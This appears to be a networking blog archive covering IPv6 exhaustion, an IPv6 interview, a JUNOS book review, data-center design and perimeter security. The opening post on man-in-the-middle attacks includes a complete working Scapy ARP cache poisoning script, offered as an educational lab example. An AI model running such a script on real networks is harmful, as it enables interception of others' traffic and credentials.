Man in the Middle (MITM) Attacks Explained: ARP Poisoning

It’s been over three weeks since Firesheep was released, and yet there still seem to be many misconceptions about this particular vulnerability.  The most prevalent of these is that HTTP session hijacking, also known as “sidejacking,” is something limited to wireless networks.  And this belief is not limited to just session hijacking attacks.  Somewhere along the way a myth was propagated that wired switched networks are somehow impervious to these and other similar attacks because of the use of collision domains and the supposed inability of an attacker to gain unfettered access to the Layer 2 medium.  As I mentioned in my previous article on the Misconceptions About Sidejacking with Firesheep, attacks like these are not relegated strictly to wireless networks; in fact, there are many so-called Man-in-the-Middle (MITM) attacks which can be performed on a switched wired network to compromise the imaginary security of a Layer 2 collision domain.
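To make the mechanism concrete before the full write-up: the sketch below uses the Scapy packet library to show the essence of ARP cache poisoning, the MITM technique covered in the linked article.  This is an illustrative sketch only, not the tooling discussed there; the victim and gateway addresses are hypothetical lab placeholders, and it should only ever be run on a network you own.

```python
#!/usr/bin/env python3
# Minimal ARP cache poisoning sketch using Scapy (requires root privileges).
# The addresses below are hypothetical lab placeholders.  To actually forward
# the intercepted traffic, IP forwarding must also be enabled on the attacker.
import time
from scapy.all import ARP, Ether, send, srp

VICTIM_IP = "192.168.1.10"    # hypothetical victim
GATEWAY_IP = "192.168.1.1"    # hypothetical default gateway


def get_mac(ip):
    """Resolve a host's real MAC address with a broadcast ARP request."""
    answered, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip),
                      timeout=2, verbose=False)
    return answered[0][1].hwsrc if answered else None


def poison(target_ip, target_mac, spoofed_ip):
    """Send a forged ARP reply telling target_ip that spoofed_ip is at our MAC."""
    send(ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoofed_ip),
         verbose=False)


victim_mac = get_mac(VICTIM_IP)
gateway_mac = get_mac(GATEWAY_IP)

# Re-poison both ends periodically so traffic between them keeps flowing
# through the attacker's machine rather than directly across the switch.
while True:
    poison(VICTIM_IP, victim_mac, GATEWAY_IP)    # victim now maps gateway -> attacker
    poison(GATEWAY_IP, gateway_mac, VICTIM_IP)   # gateway now maps victim -> attacker
    time.sleep(2)
```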

Continue reading “Man in the Middle (MITM) Attacks Explained: ARP Poisoning”

Bluehost IPv6 Epic Fail

Recently, I had a conversation with my hosting provider to determine whether they had IPv6 support.  I’m interested in getting my web site set up and reachable via IPv6.  Below is a copy of the conversation I had with their customer support, and it clearly indicates we’ve got a long way to go before IPv6 is ready for the masses:

Bluehost Support: Hi, how can I help you?
Stefan: Hi, I am a hosting customer and I was wondering if you currently have support for IPv6?
Bluehost Support: Let me look into that for you.
Bluehost Support: Yes, we do support IPv6.
Stefan: Great! Is there a cost associated with that and how do I go about setting that up?
Bluehost Support: I am sorry, we cannot give you IPv6 until our IP5 runs out.
Stefan: Wait, you just told me you have support for IPv6.  What the heck is IP5?
Bluehost Support: IP5 is the version before IP6.  We can’t give you an IP6 until our IP5 runs out. I am sorry for the misunderstanding.

The Misconceptions of Sidejacking with Firesheep

Unless you’ve been hiding under a rock for the past few days, you are probably well aware of the recent activity around a new Firefox extension developed by a pair of researchers that brings the issue of session hijacking front and center.  The duo behind this extension, Eric Butler and Ian “craSH” Gallagher, developed the software in order to demonstrate the vulnerabilities inherent in many web sites that don’t fully implement encryption.  The browser extension, dubbed “Firesheep”, essentially enables an attacker to grab other people’s credentials and use them to gain access to various web sites.

Continue reading “The Misconceptions of Sidejacking with Firesheep”

Tomorrow’s Data Center – Realizing the Potential of Virtualization

I’m not sure what the Data Center of tomorrow will look like, but one thing is for sure: it will most likely look a whole lot different than it does today.

We’ve seen the benefits that server virtualization brings by creating a level of abstraction between the software and the underlying hardware. But in order for the true vision of virtualization to take hold, the physical resources will themselves need to become decoupled from the physical chassis we think of today when we think of a traditional server – be it a rackmountable server, a blade chassis, or some other type of form factor. We need to stop thinking of resources in the manner we’ve become accustomed to – as physically constrained devices with finite boundaries – and start thinking beyond, towards pools of resources.

Instead of the form factor of a server which consists of memory, CPU, and I/O interfaces for network and storage, all of these components will need to be removed and something altogether different will need to take their place. We need to start thinking in terms of blades or insertable modules which consist solely of a given set of resources (memory, compute, storage I/O, etc.). We can then pool all of these resources together to create individual compute farms or memory farms, or farms of any other type of resource to which we want the fluid ability to add capacity on the fly. Additional compute resources could be gained simply by adding another compute module to the compute farm. More memory could be added to the system by simply adding another memory blade to the memory farm. Additional bandwidth could be added by simply adding another blade consisting of high density Ethernet ports to the network farm. Not only will this enable greater agility in our data center, it will also enable each resource to be scaled independently of the others – something that is difficult today given the fixed-constraint server architecture in which most of these resources currently exist.  And yet, even though we are creating individual farms of resources, the virtualization capabilities present in the Data Center of tomorrow will allow the network administrator to pick and choose which subsets of these resources to combine and present to individual VMs.
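To make that idea a bit more concrete, here is a toy sketch of how disaggregated resource farms might be modeled and composed for an individual VM.  All of the class names, pool sizes, and the composition step are hypothetical illustrations of the concept, not any actual product or API:

```python
# Toy model of disaggregated resource "farms": each pool scales independently by
# adding modules, and a VM is composed from slices of several pools.  Purely
# illustrative; names and numbers are hypothetical.
from dataclasses import dataclass, field


@dataclass
class ResourcePool:
    name: str
    unit: str
    capacity: int        # total units across all installed modules/blades
    allocated: int = 0

    def add_module(self, units: int) -> None:
        """Adding another blade to the farm simply grows the pool's capacity."""
        self.capacity += units

    def allocate(self, units: int) -> int:
        if self.allocated + units > self.capacity:
            raise RuntimeError(f"{self.name} farm is out of capacity")
        self.allocated += units
        return units


@dataclass
class ComposedVM:
    name: str
    resources: dict = field(default_factory=dict)


compute = ResourcePool("compute", "cores", capacity=128)
memory = ResourcePool("memory", "GiB", capacity=1024)
network = ResourcePool("network", "Gbps", capacity=400)

# Scaling one dimension independently: just add another memory blade to that farm.
memory.add_module(512)

# The virtualization layer picks subsets of each farm to present to a single VM.
vm = ComposedVM("app-vm-01", {
    "cores":    compute.allocate(8),
    "mem_gib":  memory.allocate(64),
    "net_gbps": network.allocate(10),
})
print(vm)
```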

Another area where we might see considerable change is the traditional rack itself. Today the rack doesn’t offer much in the way of intelligence; it’s really just a mechanism we use to organize and situate our resources. Is it possible that the rack itself might evolve to become an underlying fabric which ties together all of these different resource pools and presents them to the resource virtualization layer in a unified fashion? Perhaps the fabric incorporated into the rack will provide the necessary connectivity between all the elements in a fashion similar to what is provided today via a traditional motherboard. Developments by Intel with their Light Peak technology might ultimately provide the high speed connectivity required in such a design.  It’s possible that even good old Ethernet might provide that connectivity, as we can see happening with FCoE and Remote Direct Memory Access over Converged Enhanced Ethernet.

And finally, something that might look a whole lot different tomorrow is the physical alignment of the rack itself – with racks being turned on their sides in a horizontal fashion to assist with cable management and ease of resource access. The cooling of the equipment might be done by liquid rather than traditional air currents, as is being developed by companies like Green Revolution Cooling. Their GreenDEF coolant is essentially made from non-toxic mineral oil and, unlike water, is not electrically conductive. Green Revolution Cooling’s promise is that their cooling solutions offer dramatically lower up-front costs for greenfield deployments, lower energy use, and higher performance than traditional cooling systems, with up to 45% less power and up to 95% less traditional cooling required.

Ultimately, in order for the vision of virtualization to realize its true potential, the physical mold we have become accustomed to will have to be broken. Resources will need to be pooled together, and that just isn’t effective or scalable within the confines of the traditional server chassis as we know it today. On top of that, green computing and the desire to save money and reduce carbon footprint, coupled with the efficiencies that might be gained by changing the alignment of racks and resources, are going to result in a Data Center that looks fundamentally different than it does today.

Interview with Chris Grundemann, Author of ‘Day One: Exploring IPv6’

Spend a little time in Juniper, ARIN or a wide variety of other networking forums, and you’ll likely see the name Chris Grundemann.  Recently, we had the opportunity to catch up with him and discuss the nature of his involvement in deploying IPv6 at tw telecom, as well as his recently published Juniper booklet entitled “Day One: Exploring IPv6”.


Thanks Chris for joining us today.  Tell us a little bit about yourself and your career experience, and specifically tell us about your day-to-day experience working with IPv6.

Certainly. Career-wise, I am currently engaged as a Network Architect with tw telecom inc. where I am responsible for setting forward looking architectures and leading various technology development efforts. I am also the Founding Chair of the Colorado Chapter of the Internet Society, Founding Editor of Burning with the Bush and an active participant (and current AC nominee) in the ARIN policy development process. Obviously I am also the author of the Juniper “Day One: Exploring IPv6” booklet.

My day-to-day experience with IPv6 is actually pretty minimal at this point. Last year while I was still on the IP backbone team here at tw telecom, I rolled out IPv6 across all of our PE routers – in one night. Since then, there has been very little technical work needed from a networking perspective. We still have plenty of work to fully operationalize IPv6 but it is mostly systems and process issues now, much less exciting.

For any readers who are interested, you can find a lot more about me on my personal site. This includes links to my Facebook and LinkedIn profiles, so feel free to send me an invite to connect!

You rolled out IPv6 across all of your PE routers in a single night! That’s a pretty big accomplishment. Would you say that Juniper’s implementation of IPv6 made it easy to deploy and support IPv6 across a large number of devices?

Thanks! There was of course plenty of preparation leading up to that night, but we “flipped the switch” all at once and it went extremely smoothly.

All of Juniper’s carrier routers forward IPv6 in hardware, which is huge. Also, IPv6 was integrated into Junos very well; most of the commands are similar, if not the same, between IPv4 and IPv6. This makes it really easy, operationally speaking. So, yes, I would definitely agree that Juniper’s implementation of IPv6 makes it easy to deploy and scale.

Ok, so let’s specifically talk about the current state of affairs with IPv6.  Hurricane Electric, one of the leading providers of IPv6 connectivity, states that as of the time of this writing we have less than a year remaining until complete IPv4 exhaustion.  This is based on the fact that there are only sixteen /8 network blocks available for allocation (approximately 6% of the total address space).  We’ve heard figures such as this for many years now, but techniques like NAT have allowed people to extend the life of the existing IPv4 address pool.  Based on your experience working with IPv6 and also your involvement with ARIN, can you help us to understand what is fact and what is fiction – how long do you really think we have before total address exhaustion becomes a reality and customers will have no choice but to start looking at IPv6 for future deployments?
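(A quick back-of-the-envelope check on the figures in that question – sixteen /8s out of the 256 possible, each holding 2^24 addresses:)

```python
# Sanity check of the exhaustion figures quoted above.
total_slash8 = 256                # the whole IPv4 space carved into /8 blocks
remaining_slash8 = 16             # blocks still in the IANA free pool at the time of writing
addresses_per_slash8 = 2 ** 24    # 16,777,216 addresses per /8

print(f"Remaining share of the space: {remaining_slash8 / total_slash8:.1%}")   # 6.2%
print(f"Remaining addresses: {remaining_slash8 * addresses_per_slash8:,}")      # 268,435,456
```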

Let me re-phrase your query into two distinct questions if I may: How long do we have with IPv4 and when will network operators be forced to consider IPv6 deployment? The answers are very different so I think they should be addressed individually.

First, how long do we have with IPv4? As you state, Hurricane Electric’s widget gives us less than a year. But let’s start with a quick level-set. There are actually three distinct points leading up to what I would call “complete IPv4 exhaustion.” The first is IANA unallocated pool exhaustion. This is the point when the global pool of IPv4 /8s designated for unicast routing reaches 5 remaining and subsequently each of the 5 RIRs receives one (thus depleting the unallocated pool completely). The second point is RIR exhaustion, when the Regional Internet Registries can no longer allocate or assign the IPv4 addresses that they received from IANA (because they don’t have any left). Finally, true exhaustion happens when the ISPs/LIRs exhaust their remaining IPv4 addresses and end users simply cannot get a routable IPv4 address.

As I understand it, Hurricane Electric is getting their data from the IPv4 Address Report built by Geoff Huston and is predicting the date of the first point: exhaustion of the IANA IPv4 unallocated address pool. As of today that date is projected to be 1 July, 2011 – less than a year away. However, this projection is based on the current and historical run-rate, on how fast we have consumed IPv4 addresses up to this point. Because so many folks have not paid attention to IPv6 and are still wholly dependent on IPv4, it is quite likely that the run-rate will increase, perhaps drastically, as we get closer to IANA unallocated pool exhaustion. If this happens, we actually have much less than one year before reaching that first point.

Predicting the second point gets a little murkier, because different folks define this point differently. Should we declare that RIR exhaustion is upon us when the first RIR runs out of unallocated IPv4 address space? When the last one does? Perhaps when the RIR for your region has no unallocated IPv4 to give you? Mr. Huston projects the date “where the first RIR has exhausted its available pool of addresses” and since he has already done all the work, it is a convenient place to set the bar. As of today that date is predicted to be 20 January, 2012. Remember again that this does not take into account any possible run on IPv4 addresses that may happen between now and then and that other RIRs will have IANA allocated IPv4 space for some time after that date.

The final point is the hardest one to pin down. This is mostly because it would be very hard, if not impossible, to quantify how much currently allocated/assigned address space is unused or underused.

Many ISPs may be able to feed off of current reserves for months or even years, while many more will run out of IPv4 addresses within weeks of receiving their last traditional allocation from their RIR.

You also have to take into account things like IPv4 address transfers which are now allowed in many regions, other possible policy changes and transition technologies such as carrier-grade-NAT (CGN). All of these things pull IPv4 use in different directions. So no one can intelligently predict this final date.

Although I cannot tell you that IPv4 will be dead in X years, there are some very important facts that we should not overlook. The first is that Geoff Huston’s projections have remained quite consistent over the past two years, and the time remaining has steadily decreased over those two years. The second is that we are running out of usable IPv4 addresses. NAT was a stop-gap to allow folks time to adopt IPv6. That time has largely been wasted, unfortunately. The bottom line is that IPv4 will continue to become more expensive to use on interconnected networks while IPv6 continues to become less expensive.

This is where the second question comes into play: When will network operators be forced to look at IPv6 deployment? The truth is that they should be looking into it now. If you are not adding only IPv6-capable hardware and software to your network now, you are going to be forced to spend extra money upgrading sooner than you would like. As IPv4 becomes ever more expensive (both directly, as ISPs charge more for it or you are forced to pay for addresses through a transfer, and indirectly, as CGNs and other transition mechanisms drive up operational costs), many will turn to IPv6 – more and more as the next two years play out. Businesses that have IPv6-capable networks now will have a competitive advantage over those who are forced to upgrade their network to get IPv6 connectivity.

An often overlooked aspect of this question is security. If your network is not IPv6-enabled today, you likely have IPv6 traffic being tunneled right through your firewalls. Another is mobile access – very soon mobile phone operators will be migrating to 4G technologies that take advantage of IPv6 addressing for all new phones on their networks. These IPv6 mobile devices will be reaching your website(s) via IPv6; if you want them to have the best possible experience, your site needs to be running IPv6 natively.  As soon as a website is IPv6-only, ISPs will be required to provide IPv6 connectivity or lose customers to those who do.

So, in short, the answer really is now. Everyone should be thinking of IPv6 when planning all future network deployments, starting now (if not yesterday).
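As a practical aside for readers: a quick way to see whether a given site already publishes AAAA records (and is therefore reachable over IPv6) is a simple address lookup.  The sketch below uses only the Python standard library; the hostnames are placeholders, so substitute your own domains.

```python
# Check whether hostnames resolve to IPv6 addresses (i.e., publish AAAA records).
# Illustrative only; the hostnames below are placeholders.
import socket


def has_ipv6(hostname: str) -> bool:
    """Return True if the host has at least one AAAA record."""
    try:
        return len(socket.getaddrinfo(hostname, 443, socket.AF_INET6)) > 0
    except socket.gaierror:
        return False


for host in ("example.com", "www.example.net"):
    print(host, "answers over IPv6" if has_ipv6(host) else "appears to be IPv4-only")
```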

Many industry experts are already speculating that an IPv4 black market will exist because of the depletion of IPv4 address space and the lack of a large IPv6 installed base. Do you suspect there will be a black market for IPv4 addresses and what impacts might this have?

The answer varies a bit depending on how you choose to define black market. Under many definitions, that market already exists. I think that it already impacts us and that it will get worse as we near and ultimately cross the free pool depletion threshold. Think spammers and phishers operating out of address blocks that they beg, borrow, steal and often “rent” or “buy.” There are also instances where much more legitimate businesses make back-room deals for the use of IP addresses.

Overall some of the most negative impacts surround the WHOIS database and the integrity of the data it contains. When folks get addresses through grey or black markets instead of from the RIR, they are probably not going to report proper reassignment registration information to the RIR. This leads to stale WHOIS data, which makes troubleshooting and abuse reporting much harder for operators and investigation much harder for law enforcement. I helped author a recently adopted ARIN policy change to start addressing some of this and am actually spearheading an effort to continue that work with another policy proposal in the ARIN region as we speak.

Another concern is prefix hijacking. This is not really a black market issue, but it is another facet of the problems we will face more and more as IPv4 gets more expensive, unless and until IPv6 adoption picks up across the board.

There is a lot of work going on right now within ARIN, the IETF and the other RIRs to try to limit the impacts of any IPv4 black market and other abuses, and also to ease the overall IPv4-to-IPv6 transition. Anyone interested in this work should join the ARIN-PPML (Public Policy Mailing List) [http://lists.arin.net/mailman/listinfo/arin-ppml] (or their local equivalent) and/or show up at a meeting, and join the conversation. ARIN and the other RIRs are open, transparent, ground-up organizations and your voice can make a huge impact.

It has been observed that the number of Autonomous Systems supporting IPv6, as well as the number of IPv6 DNS queries in the form of AAAA records, has significantly increased in the last several years.  Have we reached that critical mass where widespread adoption is imminent, and if so, what can we expect to see in the next few years?

I think that widespread adoption is imminent now, but I don’t believe that it is an issue of critical mass; it is more an issue of network operators starting to see the dates we discussed above nearing. I make the distinction because there is still very little IPv6 traffic actually flowing. What I think is happening is that the folks who have been watching this are getting a sense of urgency that is finally breaking through to the folks who write the checks. The real critical mass moment will be when we see IPv6 traffic levels really climbing and IPv4 traffic growth starting to slow. I think you can expect to see that in the next few years. Within five certainly, and probably within three.

Let’s talk for a minute about the Juniper “Day One” guides.  Can you tell us what they are all about, and more specifically, tell us a little bit about the “Day One: Exploring IPv6” guide that you’ve written.  What is it all about and what can potential readers hope to gain from reading it?

The Day One guides are exactly what the name implies: booklets that give you everything you need to know to get through your first day working on the covered topic. They are hands-on, example-driven, cut-to-the-chase primers on all sorts of topics surrounding Juniper Networks gear and the Junos OS. In “Exploring IPv6” I tried to really provide that common-sense starting point for implementing IPv6. The booklet covers enabling IPv6, adding IPv6 addresses to interfaces, configuring static routes in IPv6, and implementing IPv6 IGPs (RIPng, IS-IS and OSPFv3), as well as all the basic verification and troubleshooting that surrounds those topics. If you follow along through the book examples and work through all of the “try it yourself” exercises, you should gain a solid understanding of IPv6 LANs and how IPv6 is implemented in JUNOS, as well as a great general, vendor-agnostic view of IPv6 itself and how it differs from IPv4.

Can you tell us a little bit about the “Advanced IPv6” Day One guide that you are currently working on?  What should the network practitioner hope to gain from reading it?

Advanced IPv6 is kind of a “Day Two” guide on IPv6 in JUNOS. It continues right where Exploring IPv6 left off and moves on to more advanced topics such as BGP, VRRP, CoS, Multicast and system management. It takes you another big step towards being able to fully implement IPv6 in a production environment.

After you are done with “Advanced IPv6” do you have any other writing aspirations?

I do. Writing is definitely work but I am finding that it’s work I really enjoy. Hopefully others like my writing in these Day One booklets and that gives me the opportunity to continue writing!

Thanks for joining us today Chris.  This has been extremely informative and we are all really excited about reading your next Day One guide and are anxiously awaiting its arrival!

Book Review :: JUNOS High Availability: Best Practices for High Network Uptime

JUNOS High Availability: Best Practices for High Network Uptime
by James Sonderegger, Orin Blomberg, Kieran Milne, Senad Palislamovic
Paperback: 688 pages
Publisher: O’Reilly Media
ISBN-13: 978-0596523046

Rating: 5 stars – High Praises for JUNOS High Availability

Building a network capable of providing connectivity for simple business applications is a fairly straightforward and well-understood process. However, building networks capable of surviving varying degrees of failure and providing connectivity for mission-critical applications is a completely different story. After all, what separates a good network from a great network is how well it can withstand failures and how rapidly it can respond to them.

While there are a great many books and resources available to assist the network designer in establishing simple network connectivity, there aren’t many which discuss the protocols, technologies, and the myriad ways in which high availability can be achieved, much less tie it all together into one consistent thread. “JUNOS High Availability” does just that, in essence providing a single, concise resource covering all of the bits and pieces required in highly available networks, allowing the network designer to build networks capable of sustaining five, six, or even seven nines of uptime.

In general, there are a lot of misconceptions and misunderstandings amongst Network Engineers with regard to implementing high availability in Junos. One only needs to look at the fact that Graceful Restart (GR) protocol extensions and Graceful Routing Engine Switchover (GRES) are often mistaken for the same thing, thanks in no small part to the fact that these two technologies share similar letters in their acronyms. This book does a good job of clarifying the difference between the two and steers clear of the pitfalls typically prevalent in coverage of the subject matter. The chapter on ‘Control Plane High Availability’ covers the underpinnings of the architecture on most Juniper platforms; coverage of topics like the separation between the control and forwarding planes, and kernel replication between the Master and Backup Routing Engines, gives the reader a solid foundation for understanding concepts like Non-Stop Routing, Non-Stop Bridging, and In-Service Software Upgrades (ISSU). In particular, I found this book to be very useful on several consulting engagements in which seamless high availability was required during software upgrades, as the chapter on ‘Painless Software Upgrades’ discusses the methodology for achieving ISSU and provides a checklist of things to be performed before, during, and after the upgrade process. Similarly, I found the chapter on ‘Fast High Availability Protocols’ to be very informative as well, providing excellent coverage of BFD as well as the differences between Fast Reroute and Link and Node Protection.

Overall I feel this book is a valuable addition to any networking library, and I reference it often when I need to implement certain high availability mechanisms or simply to evaluate the applicability of one mechanism versus another for a certain deployment. The inclusion of factoring costs into a high availability design is a welcome addition and one that all too many authors fail to cover. Naturally, it only makes sense that costs should be factored into the equation, even when high availability is the desired end-state, in order to ensure that ultimately the business is profitable. If I had to make one suggestion, it is that there should be additional coverage of implementing high availability on the SRX Series Services Gateways using JSRP, as this is a fundamental high availability component within Juniper’s line of security products. To the authors’ credit, however, this book was written just as the SRX line was being released, so I don’t fault them for providing limited coverage. Perhaps more substantial coverage could be provided in the future if a Second Edition is published.

The bottom line is this – if you are a Network Engineer or Architect responsible for the continuous operation or design of mission-critical networks, “JUNOS High Availability” will undoubtedly serve as an invaluable resource. In my opinion, the chapters on ‘Control Plane High Availability’, ‘Painless Software Upgrades’, and ‘Fast High Availability Protocols’ are alone worth the entire purchase price of the book. The fact that you get a wealth of information beyond that in addition to the configuration examples provided makes this book a compelling addition to any networking library.

Reality Check: Traditional Perimeter Security is Dead!

Recently I came across a marketing event promoted by a network integrator which touted industry-leading solutions to assist customers in determining “what was lurking outside their network”, as can be seen in the screenshot below. Please note that all references to the company have been removed to protect the not-so-innocent.

[Screenshot of the integrator’s marketing promotion, with company references removed]

In this day and age, it still surprises me when supposedly network-savvy folks think of network security in terms of a traditional perimeter made up of firewalls or IPS devices. The truth of the matter is that the traditional perimeter vanished quite a few years ago.

Only looking at the perimeter gives the end user a false sense of protection. It completely fails to recognize the dangers of mobility in today’s workplace environment. Users roam. They might bring viruses or other Trojans INSIDE your network, where those threats are free to roam unencumbered. In the worst of these cases, the perimeter is only secured in one direction, giving outbound traffic unfettered access and completely ignoring data that might be leaked from hosts inside your network to hosts outside your network, as might be the case with keyloggers or other similar types of rogue programs.

Furthermore, in today’s environment composed of virtualized machines, the line gets even blurrier, which is why we are starting to see solutions from startup vendors such as Altor Networks. It’s one thing when we are dealing with physical hosts in the traditional sense, but what about the situation where you are dealing with a multitude of virtual machines on the same physical host which must talk to each other?

When you take a data-focused approach instead of a technology-focused approach, the problem and its solutions start to make more sense.   The perimeter should be viewed as the demarcation between the data and any I/O fabric providing connectivity between that data and some external entity. This is the domain of things like Data Loss Prevention (DLP), Network Access Control (NAC), and Virtual Hypervisor Firewalls in addition to that of traditional security devices.


To deal with the realities of today, we must start to think of network security in terms of Hotels vs. Castles. In the Castle model, we have a big wall around our infrastructure. We might have a moat and some alligators, and perhaps we only lower our drawbridge for very special visitors. This model tends to keep a good majority of the enemies at bay, but it completely ignores that which might already be inside your network (think in terms of the Trojan horse as told in Virgil’s epic poem ‘The Aeneid’).

What is more commonly being employed is the Hotel Model.  Initially, to gain entrance into the hotel itself, we must check in with the Concierge and get our room key.  Once we have our room key, we have limited access to our own room, and perhaps some shared facilities like the pool or the gym.  In this model, we are unable to enter a room to which we do not have access.  The key word here is LIMITED access.

An all-inclusive security posture looks at the network from a holistic point of view.  The principles of Defense-in-Depth will make evident the failings of the traditional perimeter model.  The traditional perimeter is dead.  The perimeter is wherever the data is.